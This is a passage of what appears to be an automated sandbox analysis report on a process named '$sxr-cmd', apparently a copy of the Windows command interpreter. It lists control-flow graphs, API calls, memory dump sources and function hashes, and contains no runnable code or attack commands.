7ff6154fc7f3-7ff6154fc7fe 1109->1112 1111->1004 1112->1101 1112->1108 1113->1058
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleTitlewcschr
                                                                                                                      • String ID: /$:$C:\Windows
                                                                                                                      • API String ID: 2364928044-2365244837
                                                                                                                      • Opcode ID: 5be3b52e050be901e413cad103f4228bc73007883b0d085a4ae858b48071e86f
                                                                                                                      • Instruction ID: 9afb0da88b59da8581de54fec2bb660caa9c198dd2d7e76d83625080bd12e683
                                                                                                                      • Opcode Fuzzy Hash: 5be3b52e050be901e413cad103f4228bc73007883b0d085a4ae858b48071e86f
                                                                                                                      • Instruction Fuzzy Hash: 90C18C65A0CE4282EA649B2DE4146B9E2A1EF81FB4F459132D91EC72F5EF3CEC54C704
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1171 7ff615508d80-7ff615508da2 1172 7ff615508da4-7ff615508daf 1171->1172 1173 7ff615508dcc 1172->1173 1174 7ff615508db1-7ff615508db4 1172->1174 1177 7ff615508dd1-7ff615508dd9 1173->1177 1175 7ff615508db6-7ff615508dbd 1174->1175 1176 7ff615508dbf-7ff615508dca Sleep 1174->1176 1175->1177 1176->1172 1178 7ff615508de7-7ff615508def 1177->1178 1179 7ff615508ddb-7ff615508de5 _amsg_exit 1177->1179 1181 7ff615508e46 1178->1181 1182 7ff615508df1-7ff615508e0a 1178->1182 1180 7ff615508e4c-7ff615508e54 1179->1180 1183 7ff615508e56-7ff615508e69 _initterm 1180->1183 1184 7ff615508e73-7ff615508e75 1180->1184 1181->1180 1185 7ff615508e0e-7ff615508e11 1182->1185 1183->1184 1186 7ff615508e77-7ff615508e79 1184->1186 1187 7ff615508e80-7ff615508e88 1184->1187 1188 7ff615508e38-7ff615508e3a 1185->1188 1189 7ff615508e13-7ff615508e15 1185->1189 1186->1187 1191 7ff615508e8a-7ff615508e98 call 7ff6155094f0 1187->1191 1192 7ff615508eb4-7ff615508ec8 call 7ff6155037d8 1187->1192 1188->1180 1190 7ff615508e3c-7ff615508e41 1188->1190 1189->1190 1193 7ff615508e17-7ff615508e1b 1189->1193 1194 7ff615508f28-7ff615508f3d 1190->1194 1191->1192 1203 7ff615508e9a-7ff615508eaa 1191->1203 1199 7ff615508ecd-7ff615508eda 1192->1199 1196 7ff615508e2d-7ff615508e36 1193->1196 1197 7ff615508e1d-7ff615508e29 1193->1197 1196->1185 1197->1196 1201 7ff615508edc-7ff615508ede exit 1199->1201 1202 7ff615508ee4-7ff615508eeb 1199->1202 1201->1202 1205 7ff615508ef9 1202->1205 1206 7ff615508eed-7ff615508ef3 _cexit 1202->1206 1203->1192 1205->1194 1206->1205
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4291973834-0
                                                                                                                      • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                      • Instruction ID: 185d2d96a5efd87cca98b64283d554c0954cfed03166cce1582965564f30eb76
                                                                                                                      • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                      • Instruction Fuzzy Hash: 9441D129A08E43C6FB609B21E940679A3A0AF54FA8F140436DA1DC7AB1DF7CEC458740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1207 7ff6154f89c0-7ff6154f8a3d memset call 7ff6154fca40 1210 7ff6154f8a43-7ff6154f8a71 GetDriveTypeW 1207->1210 1211 7ff6154f8ace-7ff6154f8adf 1207->1211 1212 7ff61550b411-7ff61550b422 1210->1212 1213 7ff6154f8a77-7ff6154f8a7a 1210->1213 1214 7ff6154f8ae1-7ff6154f8ae8 ??_V@YAXPEAX@Z 1211->1214 1215 7ff6154f8aed 1211->1215 1216 7ff61550b430-7ff61550b435 1212->1216 1217 7ff61550b424-7ff61550b42b ??_V@YAXPEAX@Z 1212->1217 1213->1211 1218 7ff6154f8a7c-7ff6154f8a7f 1213->1218 1214->1215 1219 7ff6154f8aef-7ff6154f8b16 call 7ff615508f80 1215->1219 1216->1219 1217->1216 1218->1211 1220 7ff6154f8a81-7ff6154f8ac8 GetVolumeInformationW 1218->1220 1220->1211 1222 7ff61550b3fc-7ff61550b40b GetLastError 1220->1222 1222->1211 1222->1212
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 850181435-0
                                                                                                                      • Opcode ID: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                                                                                                      • Instruction ID: 5e42555abe09a5b70b44d68fb2c5f699ded8d4526c8c06f9d4248b15f0452a6a
                                                                                                                      • Opcode Fuzzy Hash: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                                                                                                      • Instruction Fuzzy Hash: 30418F36A08FD1C9EB608F24D8442EDB7A4FB89F64F554126DA4D8BB68CF38D955C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1224 7ff615504a14-7ff615504a3e GetEnvironmentStringsW 1225 7ff615504a40-7ff615504a46 1224->1225 1226 7ff615504aae-7ff615504ac5 1224->1226 1227 7ff615504a59-7ff615504a8f GetProcessHeap RtlAllocateHeap 1225->1227 1228 7ff615504a48-7ff615504a52 1225->1228 1230 7ff615504a91-7ff615504a9a memmove 1227->1230 1231 7ff615504a9f-7ff615504aa9 RtlFreeHeap 1227->1231 1228->1228 1229 7ff615504a54-7ff615504a57 1228->1229 1229->1227 1229->1228 1230->1231 1231->1226
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocateEnvironmentFreeProcessStringsmemmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2247642577-0
                                                                                                                      • Opcode ID: 802b6fabda809232f6ce418b0fbabebe6d7003abc813b1358966284b18434ee4
                                                                                                                      • Instruction ID: 9b803e2876d83077d371ed9e94b4376a9a5af612e897382477d80f1dcc7b7ff4
                                                                                                                      • Opcode Fuzzy Hash: 802b6fabda809232f6ce418b0fbabebe6d7003abc813b1358966284b18434ee4
                                                                                                                      • Instruction Fuzzy Hash: 7C11A32AA15F92C2DE109B11B41403DFBA1FB89FA4B499035DE4E83B65DF3DEC418740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$FullNamePathwcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1464828906-0
                                                                                                                      • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                      • Instruction ID: b8d73753e9bf7b8a4d354222681db4987ea928d4ba8edb1db581a63bf688470d
                                                                                                                      • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                      • Instruction Fuzzy Hash: C531D129A08A5286E7249F15A40007EF761EB49FA8F659636DA5EC33F1DF7DEC458300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F8798), ref: 00007FF615504AD6
                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F8798), ref: 00007FF615504AEF
                                                                                                                        • Part of subcall function 00007FF615504A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A28
                                                                                                                        • Part of subcall function 00007FF615504A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A66
                                                                                                                        • Part of subcall function 00007FF615504A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A7D
                                                                                                                        • Part of subcall function 00007FF615504A14: memmove.MSVCRT(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A9A
                                                                                                                        • Part of subcall function 00007FF615504A14: RtlFreeHeap.NTDLL(?,?,00000000,00007FF6155049F1), ref: 00007FF615504AA2
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F8798), ref: 00007FF61550EE64
                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF6154F8798), ref: 00007FF61550EE78
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$Free$AllocAllocateEnvironmentStringsmemmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3193623387-0
                                                                                                                      • Opcode ID: 573339bfc65e46a6dc0536e612d39ff43a234acebcc174d4b54bf8b687b66270
                                                                                                                      • Instruction ID: b5b3ca44af3574071aaaeae2f066e366963a1983f60bf04248fe2802cea198e7
                                                                                                                      • Opcode Fuzzy Hash: 573339bfc65e46a6dc0536e612d39ff43a234acebcc174d4b54bf8b687b66270
                                                                                                                      • Instruction Fuzzy Hash: 7FF0E769A19E42CAEE189B669404178E9D1EF8EF65B4D9434C90EC23A1EF3CA9448710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset
                                                                                                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                      • API String ID: 2221118986-3416068913
                                                                                                                      • Opcode ID: c44a4f921b2871da75a6341d1782bc5e11e8903ade1904c719f7b607e4e2203c
                                                                                                                      • Instruction ID: 9c76e00c71eec368a665d3ac37612da98e7980b5a6d24d6966a5716322f817ba
                                                                                                                      • Opcode Fuzzy Hash: c44a4f921b2871da75a6341d1782bc5e11e8903ade1904c719f7b607e4e2203c
                                                                                                                      • Instruction Fuzzy Hash: 19117025A18F4681EB54CB69E1542B9A2A09F85FB4F184232DA6DCB7F5DF3CE8908314
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memsetwcschr
                                                                                                                      • String ID: 2$COMSPEC
                                                                                                                      • API String ID: 1764819092-1738800741
                                                                                                                      • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                      • Instruction ID: 27cc8f6fc7557881489dccf90d9a02b23547ebfdcce0909de8a7a8673c62a509
                                                                                                                      • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                      • Instruction Fuzzy Hash: C2516D25A08E4285FB649B2DA4513B9A395AF46FA4F084033DA4EC66F9DF3CEC648741
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4254246844-0
                                                                                                                      • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                                      • Instruction ID: ec1127bf8386acc7cf0529950c417b0d68c0e4bfdc93b57ef294f9b8d612865c
                                                                                                                      • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                                      • Instruction Fuzzy Hash: 01418229A09F4286EE608B10E45537AE7A0EF85FA8F554532DA4EC77E5EF3CF8458700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2643372051-0
                                                                                                                      • Opcode ID: 515bd75455fc8bf0b419e36a5d89a3138a905a51cbad146b731857f3ffb38bca
                                                                                                                      • Instruction ID: 28036bd79603fab6276f7459ebf30f5d04f7809509e0b239c05d19bc491cabe1
                                                                                                                      • Opcode Fuzzy Hash: 515bd75455fc8bf0b419e36a5d89a3138a905a51cbad146b731857f3ffb38bca
                                                                                                                      • Instruction Fuzzy Hash: 34F08166A19F42C6EB409B75F404075EAE1FF9DFB0B4A9235C92E833B1DF3C98448640
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _get_osfhandle$ConsoleMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1591002910-0
                                                                                                                      • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                      • Instruction ID: 899d9afaafdd2ec3e0e30c465bc47621afe5f0b35e7d91df0a4c0575b6054e75
                                                                                                                      • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                      • Instruction Fuzzy Hash: 75F07439A09E02CBE644CB24E845078BBB0FB8AF31F564174C90E83331DF3CA8158B40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DriveType
                                                                                                                      • String ID: :
                                                                                                                      • API String ID: 338552980-336475711
                                                                                                                      • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                      • Instruction ID: 06dbba96bafd741e61008b67e2f7b571703fc0a93dabe7a4228583d50effa83e
                                                                                                                      • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                      • Instruction Fuzzy Hash: F7E06D6A618A40C6EB209B60E45106AF7A0FB8DB58FC51525EA8DC3734EF3CD249CB08
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907026637.0000020D0B5F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000020D0B5F0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b5f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocLibraryLoadVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3550616410-0
                                                                                                                      • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                                      • Instruction ID: 12bc5f3573c2f4db11740c667e5c07846b01db0bf613c7666455f812f9685a17
                                                                                                                      • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                                      • Instruction Fuzzy Hash: 5B6106B270A75287EB54CF96D858769F7A2FB04BA4F448415EF0D07BC6EA39D852C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF6154FCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154FB9A1,?,?,?,?,00007FF6154FD81A), ref: 00007FF6154FCDA6
                                                                                                                        • Part of subcall function 00007FF6154FCD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF6154FB9A1,?,?,?,?,00007FF6154FD81A), ref: 00007FF6154FCDBD
                                                                                                                      • GetConsoleTitleW.KERNELBASE ref: 00007FF615505B52
                                                                                                                        • Part of subcall function 00007FF615504224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF615504297
                                                                                                                        • Part of subcall function 00007FF615504224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6155042D7
                                                                                                                        • Part of subcall function 00007FF615504224: memset.MSVCRT ref: 00007FF6155042FD
                                                                                                                        • Part of subcall function 00007FF615504224: memset.MSVCRT ref: 00007FF615504368
                                                                                                                        • Part of subcall function 00007FF615504224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF615504380
